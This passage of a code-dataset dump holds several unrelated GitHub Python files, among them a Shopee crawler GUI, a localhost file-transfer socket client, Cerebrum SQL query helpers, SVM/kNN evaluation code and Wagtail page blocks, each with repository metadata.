text='同類商品價格查詢', width=button_width, height=button_height, command=action3,font=button_fontStyle,\n 
fg='SlateGray')\n button3.grid(row=2, column=2)\n exit = Button(button_frame, text='產生地圖', width=button_width, height=button_height, command=create_map,\n font=button_fontStyle, fg='SlateGray')\n exit.grid(row=2, column=3)\n label= Label(start_frame, text=\"現在搜尋的是蝦皮商場上\"+keyword+\"的資訊\"+\"\\n\\n\\n\\n\\n本程式想要利用競品情報來提高自己銷售業績:\\n 1.找出目前最熱門商品的特性\\n 2.上架商品價格分析\\n 3.商品訂價策略\", justify=LEFT,\n bd=180, font=fontStyle2, fg='SlateGray')\n label.grid(row=0, column=0)\n\n exit.grid(row=2, column=3)\n start_frame.grid_propagate(0)\n button_frame.grid_propagate(0)\n t.mainloop()\n return\n\n\ndef show_graph():\n plt.style.use('ggplot')\n plt.rcParams['font.family'] = 'DFKai-SB'\n df = sd.count()\n df['出現次數'].plot(kind='pie', title='圓餅圖', figsize=(4, 4))\n plt.show()\n return\n\n\ndef GUI_3(df):\n def button_event():\n # 將取到的價格轉數字以利於比大小\n low = int(myentry1.get())\n high = int(myentry2.get())\n df2 = df[(df['價格'] > low) & (df['價格'] < high)]\n #補齊index\n df2 = df2.reset_index(drop=True)\n #關掉視窗\n root.destroy()\n show_GUI_table(df2)\n\n\n root = tkinter.Tk()\n root.title('同類商品價格查詢')\n root.geometry('400x100')\n title = tkinter.Label(root, text='同類商品價格查詢', bg='yellow', fg='#263238', font=('Arial', 12))\n title.grid(row=0, column=0)\n #tkinter entry 輸入的變數要是stringVar\n #設定 => stringVar.set()\n #書櫥 => stringVar.get()\n var1 = tkinter.StringVar()\n var2 = tkinter.StringVar()\n myentry1 = tkinter.Entry(root, width=20, textvariable=var1)\n myentry1.grid(row=1, column=0)\n text1 = tkinter.Label(root, text='到', bg='yellow', fg='#263238', font=('Arial', 12))\n text1.grid(row=1, column=1)\n myentry2 = tkinter.Entry(root, width=20, textvariable=var2)\n myentry2.grid(row=1, column=2)\n mybutton = tkinter.Button(root, text='Search', command=button_event)\n mybutton.grid(row=2, column=2)\n root.mainloop()\n return\ndef GUI_4():\n map.createMap()\n\n root = tkinter.Tk()\n root.title(\"showMap\")\n root.geometry(\"200x200\")\n #有能夠接受html格式參數的label\n mylabel = HTMLLabel(root , html =r\"
    Go to map!!!
    \")\n\n mylabel.grid(row = 0 , column = 0)\n root.mainloop()\n\n","repo_name":"brankhsu/python-project-crawler","sub_path":"GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":5086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"73185994492","text":"import socket\r\nimport time\r\nimport sys\r\nfrom termcolor import colored\r\n\r\nADDR = \"127.0.0.1\"\r\nPORT = 22222\r\nENCODER = 'utf-8'\r\n\r\ndef startClient():\r\n client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n client_socket.connect((ADDR, PORT))\r\n print(colored(\"\\n* Connection established! \\n\", \"blue\"))\r\n\r\n try:\r\n while True:\r\n message = client_socket.recv(1024).decode(ENCODER)\r\n\r\n print(message)\r\n\r\n client_socket.send(\"\\n You are connected to the client... \\n\".encode(ENCODER))\r\n\r\n print(colored(\"\\n* Enter the file name to be downloaded... \\n\", \"yellow\"))\r\n user_input_filename = input(\"\\n* Client: \\n\")\r\n\r\n with open(user_input_filename, 'wb') as f:\r\n print(colored(\"\\n* File opened... \\n\", \"blue\"))\r\n while True:\r\n data = client_socket.recv(1024)\r\n if not data:\r\n break\r\n f.write(data)\r\n f.close()\r\n print(colored(\"\\n* Successfully get the file! \\n\", \"blue\"))\r\n client_socket.close()\r\n\r\n except KeyboardInterrupt:\r\n print(colored(\"\\n* Program end! \\n\", \"red\"))\r\n client_socket.close()\r\n \r\n except ConnectionRefusedError:\r\n print(colored(\"\\n* Server has not started make sure the server is running... \\n\", \"red\"))\r\n\r\nif __name__ == '__main__':\r\n startClient()","repo_name":"AdamOlTR/Server-Client-Image-Transfer-with-http-https-request","sub_path":"python-multiple-images-transfer-using-sockets/client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"29549625079","text":"def rev_word(str, start, end):\r\n return str[start:end][::-1]\r\n\r\n\r\ndef rev_string(str):\r\n start = 0\r\n idx = 0\r\n out = \"\"\r\n if len(str) == 0 or str.isspace():\r\n return \"Please give me good input\"\r\n for char in str:\r\n if char == \" \":\r\n end = idx\r\n out += rev_word(str, start, end) + \" \"\r\n start = idx\r\n idx += 1\r\n out = out[0:len(out)-1]\r\n out += rev_word(str, end+1, len(str))\r\n if out == \"\":\r\n return str[::-1]\r\n return out\r\n\r\n","repo_name":"estara/reverse-words","sub_path":"reverse_words.py","file_name":"reverse_words.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24450240571","text":"'''\nINTRODUCTION:\nBuilding a conversion function\nYou've been doing a lot of repetitive calculations. Anytime you notice repetition in your work, consider automation. The more of the\nlow-variance work you can automate, the more time you will have to explore new and interesting data science topics at work. 
This will\nboth impress your marketing stakeholders and be more fun!\n\nSince you know the format of the marketing DataFrame will remain the same over time, you can build a function to enable you to calculate\nconversion rate across any sub-segment you want on the fly.\n\nIn this exercise, you will build a function that takes a DataFrame and list of column names and outputs the conversion rate across the column(s).\n\nINTRUCTION:\nIsolate rows in the user inputted dataframe where users were converted, then group by the list of user inputted column_names and count\nthe number of unique converted users.\nGroup the user inputted dataframe by the list of user inputted column_names and calculate the total number of users.\nFill any missing values in conversion_rate with 0.\n'''\ndef conversion_rate(dataframe, column_names):\n # Total number of converted users\n column_conv = dataframe[dataframe['converted'] == True]\\\n .groupby(column_names)['user_id'].nunique()\n\n # Total number users\n column_total = dataframe.groupby(column_names)['user_id'].nunique()\n\n # Conversion rate\n conversion_rate = column_conv/column_total\n\n # Fill missing values with 0\n conversion_rate = conversion_rate.fillna(0)\n return conversion_rate\n\n","repo_name":"GitBulk/datacamp","sub_path":"marketing analytics with python/01 analyzing marketing campaigns with pandas/12_building_a_conversion_function.py","file_name":"12_building_a_conversion_function.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20854498667","text":"#!/usr/bin/env python\ntry:\n\tfrom kast import ast_export\nexcept:\n\tprint(\"What gives\")\nfrom parser_test_helper import *\n\n@SkippingTest\nclass CompilerPythonEquivalenceTest: # (ParserBaseTest):\n\tdef test_compiler_output_equivalence(self):\n\t\tskip()\n\t\tsource = '../kast/tests/hi.py'\n\t\t# source='../core/english_parser.py'\n\t\tcontents = open(source).readlines() # all()\n\t\tcontents = \"\\n\".join(contents)\n\t\tcontents = \"print('hi')\"\n\t\tinline = \"(string)\" # compile from inline string source:\n\t\tsource = inline\n\t\tparse(contents)\n\t\tfile_ast = compile(contents, source, 'exec', ast.PyCF_ONLY_AST)\n\t\t# x=ast.dump(file_ast, annotate_fields=True, include_attributes=True)\n\t\tangle_ast = parse_tree(contents)\n\t\tprint((ast.dump(file_ast, annotate_fields=False, include_attributes=False)))\n\t\tprint((ast.dump(angle_ast, annotate_fields=False, include_attributes=False)))\n\t\tassert_equals(file_ast, angle_ast)\n\t\tcode = compile(angle_ast, 'file', 'exec')\n\t\tif source == inline:\n\t\t\tast_export.emit_pyc(code)\n\t\telse:\n\t\t\tast_export.emit_pyc(code, source + \".pyc\")\n\t\ttry:\n\t\t\texec(code)\n\t\texcept:\n\t\t\tpass\n\n#\n# try:\n# \tCompilerPythonEquivalenceTest().test_compiler_output_equivalence()\n# except:\n# \tpass\n","repo_name":"pannous/angle","sub_path":"tests/compiler_test.py","file_name":"compiler_test.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","stars":131,"dataset":"github-code","pt":"78"} +{"seq_id":"43243809965","text":"from __future__ import (\n absolute_import,\n division,\n print_function,\n unicode_literals,\n)\n\nimport six\n\nfrom Cerebrum.Utils import NotSet, argument_to_sql\nfrom Cerebrum.utils import reprutils\n\n\ndef _not_none(value):\n \"\"\"\n Check that value is not None/NotSet.\n\n This is typically used as transform-callback in\n ``argument_to_sql`` if no other transforms 
are suitable.\n \"\"\"\n if value is None:\n raise ValueError(\"unexpected None-value\")\n if value is NotSet:\n raise ValueError(\"unexpected NotSet-value\")\n return value\n\n\nclass _Range(object):\n \"\"\"\n Abstract range (lower/upper limits).\n\n Note that if both a gt/ge and a lt/le is given, then the two\n values must be comparable.\n \"\"\"\n def __init__(self, gt=None, ge=None, lt=None, le=None):\n gt = self._convert(gt)\n ge = self._convert(ge)\n if gt is not None and ge is not None:\n raise TypeError('invalid range: gt/ge is incompatible')\n\n self.start = ge if gt is None else gt\n self.start_inclusive = gt is None\n\n lt = self._convert(lt)\n le = self._convert(le)\n if lt is not None and le is not None:\n raise TypeError('invalid range: lt/le is incompatible')\n\n self.stop = le if lt is None else lt\n self.stop_inclusive = lt is None\n\n if all(i is None for i in (self.start, self.stop)):\n raise TypeError('invalid range: must provide a limit')\n\n if (self.start is not None\n and self.stop is not None\n and self.start > self.stop):\n raise ValueError('invalid range: start >= stop')\n\n def __repr__(self):\n pairs = []\n if self.start is not None:\n pairs.append(('ge' if self.start_inclusive else 'gt', self.start))\n if self.stop is not None:\n pairs.append(('le' if self.stop_inclusive else 'lt', self.stop))\n pretty = ' '.join(attr + '=' + repr(value) for attr, value in pairs)\n return '<{name} {fields}>'.format(name=type(self).__name__,\n fields=pretty)\n\n def _convert(self, value):\n if value is None:\n return None\n return value\n\n def get_sql_select(self, colname, ref):\n binds = {}\n conds = []\n ref_start = ref + '_start'\n ref_stop = ref + '_stop'\n\n if self.start is not None:\n start_op = '>=' if self.start_inclusive else '>'\n conds.append('{} {} :{}'.format(colname, start_op, ref_start))\n binds[ref_start] = self.start\n if self.stop is not None:\n stop_op = '<=' if self.stop_inclusive else '<'\n conds.append('{} {} :{}'.format(colname, stop_op, ref_stop))\n binds[ref_stop] = self.stop\n return '({})'.format(' AND '.join(conds)), binds\n\n\nclass NumberRange(_Range):\n\n def _convert(self, value):\n if value is None:\n return None\n return int(value)\n\n\n# class DateRange(_Range):\n# pass\n\n\n# class DatetimeRange(_Range):\n# pass\n\n\nclass Pattern(reprutils.ReprFieldMixin):\n r\"\"\"\n Simplified Cerebrum pattern matching.\n\n The Cerebrum user input pattern is a simple glob-like pattern:\n\n - '*' matches zero or more characters\n - '?' matches a single character\n - '\\*' matches a literal '*'\n - '\\?' 
matches a literal '?'\n - '\\\\' matches a literal '\\'\n\n\n To query database using Pattern:\n\n >>> Pattern(r\"Foo-*\", case_sensitive=False).get_sql_select('col', 'ref')\n ('(col ILIKE :ref)', {'ref': 'Foo-%'})\n\n >>> Pattern(r\"% _\").get_sql_select('col', 'ref')\n ('(col LIKE :ref)', {'ref': '\\\\% \\\\_'})\n\n >>> Pattern(r\"* ?\").get_sql_select('col', 'ref')\n ('(col LIKE :ref)', {'ref': '% _'})\n\n >>> Pattern(r\"\\* \\?\").get_sql_select('col', 'ref')\n ('(col LIKE :ref)', {'ref': '* ?'})\n \"\"\"\n\n repr_id = False\n repr_module = False\n repr_fields = ('pattern', 'case_sensitive')\n\n TOKEN_STRING = 'string'\n TOKEN_WILDCARD = 'wildcard'\n WILDCARDS = {\n '*': '%',\n '?': '_',\n }\n\n @classmethod\n def _sql_escape(cls, value):\n for char in cls.WILDCARDS.values():\n value = value.replace(char, '\\\\' + char)\n return value\n\n @classmethod\n def tokenize(cls, pattern, escape='\\\\'):\n \"\"\" tokenize input pattern.\n\n Tokenizes the cerebrum pattern. The un-escaped '*' and '?' are the\n only possible matches for the 'wildcard' token.\n\n :param pattern:\n A pattern (e.g. `ba?-*`)\n\n :rtype: generator\n :returns:\n yields pairs of , \n \"\"\"\n buffer = ''\n is_escaped = False\n for charno, char in enumerate(pattern, 1):\n if is_escaped:\n buffer += char\n is_escaped = False\n continue\n\n if char == escape:\n is_escaped = True\n continue\n\n if char in cls.WILDCARDS:\n if buffer:\n yield cls.TOKEN_STRING, buffer\n yield cls.TOKEN_WILDCARD, char\n buffer = ''\n else:\n buffer += char\n if is_escaped:\n # the last character was an un-escaped escape\n raise ValueError('invalid pattern (%d): %s' %\n (charno, repr(pattern)))\n if buffer:\n yield cls.TOKEN_STRING, buffer\n\n @classmethod\n def dwim(cls, pattern):\n \"\"\"\n Get a new pattern that auto selects case sensitivity.\n\n DWIM - Do What I Mean - sets case_sensitive=True if the pattern\n contains upper case characters.\n \"\"\"\n return cls(pattern, pattern != pattern.lower())\n\n def __init__(self, pattern, case_sensitive=True):\n \"\"\"\n :param pattern: A simple cerebrum search pattern.\n :param case_sensitive: If case sensitive matching should be used\n \"\"\"\n self._raw_pattern = pattern\n self._tokens = tuple(self.tokenize(pattern))\n self.case_sensitive = case_sensitive\n\n @property\n def pattern(self):\n \"\"\" input pattern, as provided. \"\"\"\n return self._raw_pattern\n\n @property\n def tokens(self):\n \"\"\" tokenized tuples. \"\"\"\n return self._tokens\n\n @property\n def sql_pattern(self):\n \"\"\" sql LIKE/ILIKE formatted pattern string. 
\"\"\"\n return ''.join(self.WILDCARDS[value]\n if token == self.TOKEN_WILDCARD\n else self._sql_escape(value)\n for token, value in self._tokens)\n\n def get_sql_select(self, colname, ref):\n \"\"\"\n Get SQL matching rule for this pattern.\n\n >>> Pattern('ba?-*', False).get_sql_select('my_t.my_col', 'my_val')\n ('(my_t.my_col ILIKE :my_val)', {'my_val': 'ba_-%'})\n\n :param colname: the column name to match\n :param ref: the binding name to use\n\n :rtype: tuple\n :returns:\n A tuple with: (, )\n \"\"\"\n op = 'LIKE' if self.case_sensitive else 'ILIKE'\n cond = '({} {} :{})'.format(colname, op, ref)\n binds = {ref: self.sql_pattern}\n return cond, binds\n\n\ndef pattern_helper(colname,\n value=NotSet,\n case_pattern=None,\n icase_pattern=None,\n nullable=False):\n \"\"\"\n Helper to prepare a string column query condition.\n\n Helps to generate conditions for matching exact string values, string\n patterns, or NULL.\n\n >>> pattern_helper(\"foo\", (\"bar\", \"baz\"), None, \"bar baz*\")\n (\n \"(foo IN (:foo0, :foo1) OR foo ILIKE :foo_i_pattern)\",\n {'foo0': 'bar', 'foo1': 'baz', 'foo_i_pattern': 'bar baz%'},\n )\n\n >>> pattern_helper(\"x.foo\", None, \"*Bar?\", nullable=True)\n (\n \"(x.foo IS NULL OR x.foo LIKE :x_foo_c_pattern)\",\n {'x_foo_c_pattern': '%Bar_'}\n )\n\n :param str colname: column name (with prefix, e.g. \"en.entity_name\")\n :param str value: value check (sequence of strings, string, None, NotSet)\n :param str case_pattern: case-sensitive pattern\n :param str icase_pattern: case-insensitive pattern\n :param bool nullable:\n If True, a (column IS NULL) OR-condition is added when `value is None`.\n This is usually what you want if the column allows NULL-values.\n \"\"\"\n conds = []\n binds = {}\n\n if nullable and value is None:\n conds.append(\"{} IS NULL\".format(colname))\n\n elif value is not None and value is not NotSet:\n conds.append(\n argument_to_sql(value, colname, binds, six.text_type))\n\n bind_like = colname.replace('.', '_') + '_c_pattern'\n bind_ilike = colname.replace('.', '_') + '_i_pattern'\n\n # case-sensitive pattern\n if case_pattern:\n c_pattern = Pattern(case_pattern, case_sensitive=True)\n c_cond, c_bind = c_pattern.get_sql_select(colname, bind_like)\n conds.append(c_cond)\n binds.update(c_bind)\n\n # case-insensitive pattern\n if icase_pattern:\n i_pattern = Pattern(icase_pattern, case_sensitive=False)\n i_cond, i_bind = i_pattern.get_sql_select(colname, bind_ilike)\n conds.append(i_cond)\n binds.update(i_bind)\n\n if len(conds) > 1:\n return '({})'.format(' OR '.join(conds)), binds\n elif conds:\n return conds[0], binds\n return None, {}\n\n\ndef date_helper(colname, value=NotSet, gt=None, ge=None, lt=None, le=None,\n nullable=False):\n \"\"\"\n Helper to prepare a date/timestamp column query condition.\n\n Helps to generate conditions for matching exact date/datetime values,\n date/datetime ranges, or NULL.\n\n >>> a, b, c = (datetime.date(2023, 4, i) for i in (15, 17, 19))\n >>> date_helper(\"foo\", (a, b), ge=c)\n (\n '((foo IN (:foo0, :foo1)) OR (foo >= :foo_range_start))',\n {'foo0': datetime.date(2023, 4, 15),\n 'foo1': datetime.date(2023, 4, 17),\n 'foo_range_start': datetime.date(2023, 4, 19)})\n\n >>> date_helper(\"foo\", None, gt=a, lt=b)\n (\n '(foo > :foo_range_start AND foo < :foo_range_stop)',\n {'foo_range_start': datetime.date(2023, 4, 15),\n 'foo_range_stop': datetime.date(2023, 4, 17)})\n\n :param str colname: column name (with prefix, e.g. 
\"en.entity_name\")\n :param value: value check (sequence of dates, date, None, NotSet)\n :param gt/ge: add range start condition (exclusive/inclusive)\n :param lt/le: add range end condition (exclusive/inclusive)\n :param bool nullable:\n If True, a (column IS NULL) OR-condition is added when `value is None`.\n This is usually what you want if the column allows NULL-values.\n \"\"\"\n conds = []\n binds = {}\n\n if nullable and value is None:\n conds.append(\"{} IS NULL\".format(colname))\n\n if value is not None and value is not NotSet:\n conds.append(\n argument_to_sql(value, colname, binds, _not_none))\n\n if any((lt, le, gt, ge)):\n bind_prefix = colname.replace('.', '_') + '_range'\n date_range = _Range(gt=gt, ge=ge, lt=lt, le=le)\n r_cond, r_bind = date_range.get_sql_select(colname, bind_prefix)\n conds.append(r_cond)\n binds.update(r_bind)\n\n if len(conds) > 1:\n return '({})'.format(' OR '.join(conds)), binds\n elif conds:\n return conds[0], binds\n return None, {}\n","repo_name":"unioslo/cerebrum","sub_path":"Cerebrum/database/query_utils.py","file_name":"query_utils.py","file_ext":"py","file_size_in_byte":11414,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"78"} +{"seq_id":"69861702974","text":"import json\r\nimport sys\r\n#import matplotlib as mpl\r\n#mpl.use('Qt5Agg')\r\nimport matplotlib.pyplot as plt\r\n\r\ndef load_json_file(path):\r\n\twith open(path, 'r') as file:\r\n\t\tjson_text = file.read()\r\n\treturn json_text\r\n\r\ndef plot_json(json_session):\r\n\tsession_dict = json.loads(json_session)\r\n\tnum_plots = session_dict['num_plots']\r\n\tfor i in range(num_plots):\r\n\t\tfig = plt.figure()\r\n\t\taxes = fig.add_subplot(1,1,1)\r\n\t\tlabel = 'plot_%d' % (i,)\r\n\t\tplot_dict = session_dict[label]\r\n\t\tnum_lines = plot_dict['num_lines']\r\n\t\tfor j in range(num_lines):\r\n\t\t\tlabel_ = 'line_%d' % (j,)\r\n\t\t\tline = plot_dict[label_]\r\n\t\t\tx = line['x']\r\n\t\t\ty = line['y']\r\n\t\t\taxes.plot(x, y, label=line['label'], picker=5)\r\n\t\taxes.grid(True)\r\n\t\taxes.legend(loc='best')\r\n\t\taxes.set_xlabel(plot_dict['xlabel'])\r\n\t\taxes.set_ylabel(plot_dict['ylabel'])\r\n\t\taxes.set_title(plot_dict['title'])\r\n\t\taxes.set_xlim(plot_dict['x_lim'])\r\n\t\taxes.set_ylim(plot_dict['y_lim'])\r\n\t\tfig.show() # Keeps Each plot in it's own window\r\n\tplt.show() # Blocks so the plots stay up until the user closes them\r\n\r\nif __name__ == '__main__':\r\n\targv = sys.argv[1:]\r\n\tif len(argv) < 1:\r\n\t\tprint( 'Please enter path to the json file you would like to plot.' )\r\n\telif len(argv) > 1:\r\n\t\tprint( 'Too many command line arguments. Please only enter the path to the json flie.' 
)\r\n\telse:\r\n\t\tpath = argv[0]\r\n\t\ttext = load_json_file(path)\r\n\t\tplot_json(text)\r\n\r\n\r\n\r\n","repo_name":"cram869/Splotter","sub_path":"util/Json_Plotter.py","file_name":"Json_Plotter.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11966531605","text":"from apps.accounts.factories import UserFactory\nfrom apps.core.test import TestCase\n\n\nclass UserTestCase(TestCase):\n \"\"\"Test case for User model.\"\"\"\n\n @classmethod\n def setUpTestData(cls):\n \"\"\"Common test data.\"\"\"\n cls.user_without_name = UserFactory.create()\n cls.user_with_name = UserFactory.create(first_name=\"John\", last_name=\"Doe\")\n\n def test_user_with_name_str(self):\n \"\"\"Test that the user return the join of first and last name.\"\"\"\n self.assertEqual(\n str(self.user_with_name),\n (\n \"%s %s\"\n % (self.user_with_name.first_name, self.user_with_name.last_name)\n ).strip(),\n )\n\n def test_user_without_name_str(self):\n \"\"\"Test that the user return the username if has no first_name.\"\"\"\n self.assertEqual(str(self.user_without_name), self.user_without_name.username)\n","repo_name":"UHo-GPDB/sigipo","sub_path":"apps/accounts/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40472082315","text":"import random\n\nimport scipy\n\nimport ITMO.knn.functions.kernel as kernels_knn\nimport ITMO.knn.functions.distance as distances\nimport numpy as np\n\nfrom ITMO.SVM import kernels\nfrom ITMO.SVM.svm import SVMClassifier\nfrom ITMO.NewShinyNaiveBayes.Metrics import Metrics\nfrom ITMO.knn.dataset import Point\nfrom ITMO.knn.knn import WeightedKNNClassifier\nfrom ITMO.util import read_csv, normalize\n\nfrom sklearn import svm\n\n\ndef make_dataset(table, shuffle=False):\n samples_x = list()\n samples_labels = list()\n if shuffle:\n np.random.shuffle(table)\n for row in table:\n samples_x.append(list(map(float, row[:-1])))\n samples_labels.append(int(row[-1]))\n return samples_x, samples_labels\n\n\ndef split_dataset(samples, ratio):\n random.shuffle(samples)\n train_size = int(len(samples) * ratio)\n return samples[:train_size], samples[train_size:]\n\n\ndef k_fold_cross_validation(samples, classifier,\n accuracy_measure, k_fold=10,\n verbose=False):\n def split_dataset_k_fold(xs, ys, k_fold, k):\n train_data_x = []\n train_data_y = []\n test_data_x = []\n test_data_y = []\n\n from_ = k * len(xs) // k_fold\n to = (k + 1) * len(xs) // k_fold\n\n for idx, (x, y) in enumerate(zip(xs, ys)):\n if from_ <= idx < to:\n test_data_x.append(x)\n test_data_y.append(y)\n else:\n train_data_x.append(x)\n train_data_y.append(y)\n\n return (train_data_x, train_data_y), (test_data_x, test_data_y)\n\n accuracy_sum = 0\n xs, ys = samples\n\n for k in range(k_fold):\n train_data, test_data = split_dataset_k_fold(xs, ys, k_fold, k)\n classifier.fit(train_data[0], train_data[1])\n predicted_data = classifier.predict(test_data[0])\n if verbose:\n pred = [max(0, y) for y in predicted_data]\n real = [max(0, y) for y in test_data[1]]\n print('k:', k, real, pred, accuracy_measure(test_data[1], predicted_data))\n accuracy_sum += accuracy_measure(test_data[1], predicted_data)\n\n return accuracy_sum / k_fold\n\n\ndef count_bicentral(samples, bic_a, mean=False):\n bicentral_samples = []\n means = [0 for _ in samples[0]]\n if mean:\n for idx in range(len(means)):\n 
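# (added note) per-coordinate mean over all samples; used to centre the data when mean=True\n            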
means[idx] = np.mean([sample[idx] for sample in samples])\n        for sample in samples:\n            sample.coords[idx] -= means[idx]\n    for sample in samples:\n        bicentral_samples.append(\n            [np.sqrt(sum([pow(coord - bic_a,2) for coord in sample])),\n             np.sqrt(sum([pow(coord + bic_a,2) for coord in sample]))])\n    return bicentral_samples\n\n\ndef calc_wilcoxon(samples, classifier_svm: SVMClassifier, classifier_knn: WeightedKNNClassifier,\n                  accuracy_measure, k_fold=10,\n                  verbose=False, alpha=0.05):\n\n    def split_dataset_k_fold(xs, ys, k_fold, k):\n        train_data_x = []\n        train_data_y = []\n        test_data_x = []\n        test_data_y = []\n\n        from_ = k * len(xs) // k_fold\n        to = (k + 1) * len(xs) // k_fold\n\n        for idx, (x, y) in enumerate(zip(xs, ys)):\n            if from_ <= idx < to:\n                test_data_x.append(x)\n                test_data_y.append(y)\n            else:\n                train_data_x.append(x)\n                train_data_y.append(y)\n\n        return (train_data_x, train_data_y), (test_data_x, test_data_y)\n\n    def convert2points(data):\n        points = []\n        for coords, label in zip(data[0], data[1]):\n            points.append(Point(0 if label == -1 else 1, coords))\n        return points\n\n    will_acc_knn = []\n    will_acc_svm = []\n    accuracy_sum_knn = 0\n    accuracy_sum_svm = 0\n    xs, ys = samples\n\n    for k in range(k_fold):\n        train_data, test_data = split_dataset_k_fold(xs, ys, k_fold, k)\n        train_data_knn, test_data_knn = convert2points(train_data), convert2points(test_data)\n\n        classifier_svm.fit(train_data[0], train_data[1])\n        classifier_knn.fit(train_data_knn, 2)\n\n        predicted_data_svm = classifier_svm.predict(test_data[0])\n        predicted_data_knn = classifier_knn.test_dataset(test_data_knn)\n\n        predicted_data_knn = [-1 if y.label == 0 else 1 for y in predicted_data_knn]\n        test_data_knn = [-1 if y.label == 0 else 1 for y in test_data_knn]\n\n        if verbose:\n            pred = [max(0, y) for y in predicted_data_svm]\n            real = [max(0, y) for y in test_data[1]]\n\n            print('knn k:', k, accuracy_measure(test_data_knn, predicted_data_knn))\n            print('svm k:', k, accuracy_measure(test_data[1], predicted_data_svm))\n            print()\n\n        accuracy_sum_knn += accuracy_measure(test_data_knn, predicted_data_knn)\n        accuracy_sum_svm += accuracy_measure(test_data[1], predicted_data_svm)\n\n        will_acc_knn.append(accuracy_measure(test_data_knn, predicted_data_knn))\n        will_acc_svm.append(accuracy_measure(test_data[1], predicted_data_svm))\n\n    values = []\n    abs_values = []\n\n    for knn, svm_meas in zip(will_acc_knn, will_acc_svm):\n        values.append(knn-svm_meas)\n        abs_values.append(np.abs(knn-svm_meas))\n\n    all_values = sorted(zip(abs_values, values), key=lambda _val: _val[0])\n    cut_values = []\n    cnt = 0\n    cnt_pos = 0\n    cnt_neg = 0\n\n    mean_svm, var_svm = np.mean(will_acc_svm), np.var(will_acc_svm)\n    mean_knn, var_knn = np.mean(will_acc_knn), np.var(will_acc_knn)\n\n    print(mean_svm, var_svm)\n\n    mean_svm, var_svm, mean_knn, var_knn = 0, 1, 0, 1\n\n    p = 1 - alpha\n\n    crit_value_svm = mean_svm+np.sqrt(2*var_svm)*scipy.special.erfinv(2*p-1)\n    crit_value_knn = mean_knn+np.sqrt(2*var_knn)*scipy.special.erfinv(2*p-1)\n    print((crit_value_knn+crit_value_svm)/2)\n\n    for val in all_values:\n        if val[0] != 0:\n            if not cut_values or val[0] != cut_values[-1][0]:\n                cnt += 1\n            cut_values.append([val[0], val[1], cnt])\n            if val[1] < 0:\n                cnt_neg += 1\n            else:\n                cnt_pos += 1\n    ch_sum = 0\n    for val in cut_values:\n        if cnt_pos > cnt_neg:\n            if val[1] < 0:\n                ch_sum += val[2]\n        else:\n            if val[1] > 0:\n                ch_sum += val[2]\n    print(\"Wilcoxon: \", ch_sum)\n    print('knn: {}\\nsvm: {}'.format(accuracy_sum_knn/k_fold, accuracy_sum_svm/k_fold))\n\n\nN_NEIGHBORS = 10\nDISTANCE_METRIC = 
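distances.euclidean  # provisional (added); the effective value is assigned on the next line\n# Added note: euclidean distance plus an Epanechnikov kernel is the weighted-kNN\n# configuration exercised in main() below; N_NEIGHBORS caps the neighbourhood size.\nDISTANCE_METRIC = 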
distances.euclidean\nKERNEL = kernels_knn.epanechnikov\n\n\ndef main():\n table = read_csv('../knn/dataset.txt', '\\t')\n\n xs, ys = make_dataset(table, shuffle=True)\n # xs, _, _ = list(normalize(np.array(xs)))\n xs = count_bicentral(xs, 0.25)\n ys = [-1 if y == 0 else 1 for y in ys]\n\n # classifier = svm.SVC(C=50, gamma='scale', )\n # classifier.fit(xs, ys)\n\n classifier = WeightedKNNClassifier(N_NEIGHBORS, DISTANCE_METRIC, KERNEL)\n # classifier2 = SVMClassifier(C=5, kernel=kernels.Polynomial(2, gamma=1, coef0=1))\n classifier2 = SVMClassifier(C=5, kernel=kernels.RadialBasis(sigma=0.3))\n\n # classifier = SVMClassifier(C=2, kernel=kernels.Polynomial(2, gamma=(1/len(xs))))\n # ans = k_fold_cross_validation((xs, ys), classifier2, Metrics.f_score2, k_fold=9, verbose=False)\n # print(ans)\n calc_wilcoxon((xs, ys), classifier_knn=classifier, classifier_svm=classifier2\n ,accuracy_measure=Metrics.f_score2, k_fold=9, verbose=True)\n\n\nif __name__ == '__main__':\n np.random.seed(42)\n main()\n","repo_name":"dxahtepb/ml-and-stuff","sub_path":"ITMO/SVM/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36810365478","text":"\"\"\"Streamfields live in here\"\"\"\n\nfrom wagtail.core import blocks\n\nfrom wagtail.images.blocks import ImageChooserBlock\n\n\nclass BannerBlock(blocks.StructBlock):\n \"\"\"\n A banner block that allows the user to add a title, subtitle, and background image.\n \"\"\"\n title = blocks.CharBlock(required=True, max_length=255)\n subtitle = blocks.CharBlock(required=True, max_length=255)\n image = ImageChooserBlock(required=True) \n image_size = blocks.ChoiceBlock(choices=[\n ('auto', 'Auto'),\n ('cover', 'Cover'),\n ('contain', 'Contain'),\n ], default='cover', required=True)\n\n button_url = blocks.CharBlock(label=\"Button URL\", help_text='Add the url for the button')\n\n class Meta:\n template = \"streams/banner.html\"\n icon = \"image\"\n label = \"Banner\"\n\n\nclass ImageSection(blocks.StructBlock):\n \"\"\" \n Image Section with description\n \"\"\" \n \n card = blocks.ListBlock(\n blocks.StructBlock(\n [\n (\"image\", ImageChooserBlock(required=True)),\n (\"title\", blocks.CharBlock(required=True, max_length=40)),\n (\"text\", blocks.TextBlock(required=True, max_length=200)), \n ]\n )\n )\n\n class Meta:\n template = \"streams/image_block.html\"\n icon = \"edit\"\n label = \"Attractions\" \n\nclass CarouselBlock(blocks.StructBlock):\n \"\"\"\n A carousel block that allows 